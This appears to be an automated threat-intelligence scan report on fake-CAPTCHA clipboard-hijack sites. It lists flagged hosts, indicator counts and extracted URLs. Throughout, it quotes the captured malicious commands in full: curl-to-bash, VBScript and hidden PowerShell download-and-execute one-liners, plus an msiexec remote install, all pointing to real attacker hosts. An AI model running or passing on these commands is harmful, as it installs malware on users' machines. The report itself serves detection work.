Threat Intelligence Report

πŸ“… February 06, 2026 πŸ•’ Generated: 2026-02-06 03:27:57 πŸ” Sites Analyzed: 84
⬇️ Download JSON Report πŸ“ View All Reports on GitHub
🌐
84
Total Sites Analyzed
⚠️
49
Malicious Sites
58.0% detection rate
πŸ’»
25
PowerShell Commands
πŸ“‹
205
Clipboard Hijacks
πŸ“Š
578
Avg Threat Score

Attack Pattern Analysis

35
High Risk Commands
205
Base64 Encoded
0
Obfuscated JS
33
Inline JS Redirects
8
External JS Chains
28
Redirect Follows
PowerShell Commands 25
Clipboard Hijacks 205
Base64 Encoded 205
CAPTCHA Elements 111
High Risk Commands 35
JS Redirects 33

Top Indicators/Keywords

hidden (16) robot (14) Robot (12) verification (11) Verification (11) Verification ID (10) Ray ID (10) I am not a robot (10) Verify you are human (10) CAPTCHA Verification (9) verification-id (9) Checking if you are human (9) To better prove you are not a robot (9) const command = (9) cmd (6)

Malicious Sites Detected

Click on a site to view detailed analysis
http://192.155.93.247:3101/
1025 indicators detected
Score: 8528
6
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 190

https://gmpg.org/xfn/11
https://yoast.com/wordpress/plugins/seo/
https://www.ccera-icar.org/
https://www.ccera-icar.org/
https://www.ccera-icar.org/wp-content/uploads/2022/08/Frame-3.png
https://3.18.128.17/
791 indicators detected
Score: 6077 Redirect Chain
5
base64
3
redirect chains
3
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 63

https://gmpg.org/xfn/11
https://3.18.128.17/feed/
https://3.18.128.17/comments/feed/
https://api.w.org/
https://3.18.128.17/wp-json/

πŸ” External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/js/video.js?ver=1
Type: script_src
Destination (first appearance): https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Script: https://3.18.128.17/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1
Type: base64_payload
Destination (first appearance): https://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

πŸ›°οΈ Redirect Follower Findings (3)

Source: external_js
Method: script_src
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Status: ok
/* videojs-vtt.js - v0.14.1 (https://github.com/gkatsev/vtt.js) built on 10-04-2018 */
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.vttjs=a()}}(function(){return function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
  <title>SVG namespace</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <link rel="stylesheet" type="text/css"
        href="https://www.w3.org/StyleSheets/TR/base"/>
</head>
<body>
<div class="head">
<p><a href="https://www.w3.org/"><img class="head"
src="https://www.w3.org/assets/logos/w3c/w3c-no-bars.svg" alt="W3C"/></a></p>
</div>
<p>
<strong>http://www.w3.org/2000/svg</strong> is an XML namespace, first defined in the 
... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.videolan.org/x264.html
 ftypmp42isomiso2avc1mp41freemdatEH, #x264 - core 142 r2479 dd79a61 - H.264/MPEG-4 AVC codec - Copyleft 2003-2014 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=2…
Status: ok
    <!DOCTYPE html>
    <html lang="en" >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
        
        <meta name="Author" content="VideoLAN" />
        <meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, m... [truncated]
https://44.208.147.17/
560 indicators detected
Score: 3873
7
base64
1
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 79

https://gmpg.org/xfn/11
https://44.208.147.17/feed/
https://44.208.147.17/comments/feed/
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F&#038;format=xml
https://5.63.157.201/
104 indicators detected
Score: 2086 Redirect Chain
5
base64
1
redirects
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } eise if (n.appName == "Netscape") { rv = ii; re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)"); if (re.exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } } return rv; } })(window, document, navigator)
robot
verification
exec(
hidden

🌐 Extracted URLs 22

https://alfavit-obuv.ru/include/logo.png
https://alfavit-obuv.ru/
https://mc.yandex.ru/watch/55085083
https://5.63.157.201/
https://api.whatsapp.com/send/?phone=79168411253

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
{ return; }}
   k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55085083, "init", {
        clickmap…
Status: ok
(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]
https://3.71.235.243/
338 indicators detected
Score: 915
1
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 150

https://gmpg.org/xfn/11
https://3.71.235.243/feed/
https://3.71.235.243/comments/feed/
https://3.71.235.243/magaza/feed/
https://3.71.235.243/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.11.14
https://tesllamacapp.com/
87 indicators detected
Score: 904 PowerShell Clipboard Hijack
1
powershell
5
clipboard
6
captcha
13
base64
1
redirect follows
13
suspicious keywords

πŸ’» PowerShell Commands 1

curl

πŸ” Suspicious Keywords 13

command box */
Command </button>
command prompt.</strong>
command beiow:</strong>
Command = cmdEiement.getAttribute('data-reai-command');
command copied
captcha verification
robot
Verification
verification-ioader

🌐 Extracted URLs 5

https://icloud.com/security/verify
https://api.ipify.org?format=json
https://api.ipify.org?format=json
https://api.myip.com
https://httpbin.org/ip

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 5 entries (truncated for performance) 

...igator.clipboard && window.isSecureContext) { navigator.clipboard.writeText(textToCopy).then(() => { if (button) {...
...tArea.select(); try { const successful = document.execCommand('copy'); if (successful) { const button = even...

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: base64_payload
curl -s http://217.119.139.117/d/roberto32100 | nohup bash &
Status: error: HTTPConnectionPool(host='217.119.139.117', port=80): Max retries exceeded with url: /d/roberto32100 (Caused by ConnectTimeoutError(<HTTPConnection(host='217.119.139.117', port=80) at 0x7feb366d
https://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://202.154.5.83:9092/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://88.198.19.78/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/dk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://174.142.195.203/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://74.50.99.45:8443/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://103.112.244.68/
175 indicators detected
Score: 665 Fake CAPTCHA
1
captcha
26
base64
2
redirects
1
suspicious keywords

πŸ” Suspicious Keywords 1

hidden

🌐 Extracted URLs 132

https://ogp.me/ns#
https://www.yppgiibandung.org/
https://www.yppgiibandung.org/igniter/an-component/media/upload-gambar-pendukung/footpath-691021_1280.jpg
http://localhost//igniter/an-component/media/upload-gambar-pendukung/20219478.png
https://www.yppgiibandung.org/an-theme/reMindz/assets/font-awesome/css/font-awesome.min.css
https://162.215.130.152/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://178.159.11.216/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://178.159.11.216/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://144.22.251.16/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://173.231.196.249/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://162.215.130.152/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://199.168.184.115/
67 indicators detected
Score: 579 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
3
base64
18
suspicious keywords

πŸ” Suspicious Keywords 18

command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Showing top 20 malicious sites. 29 additional sites detected.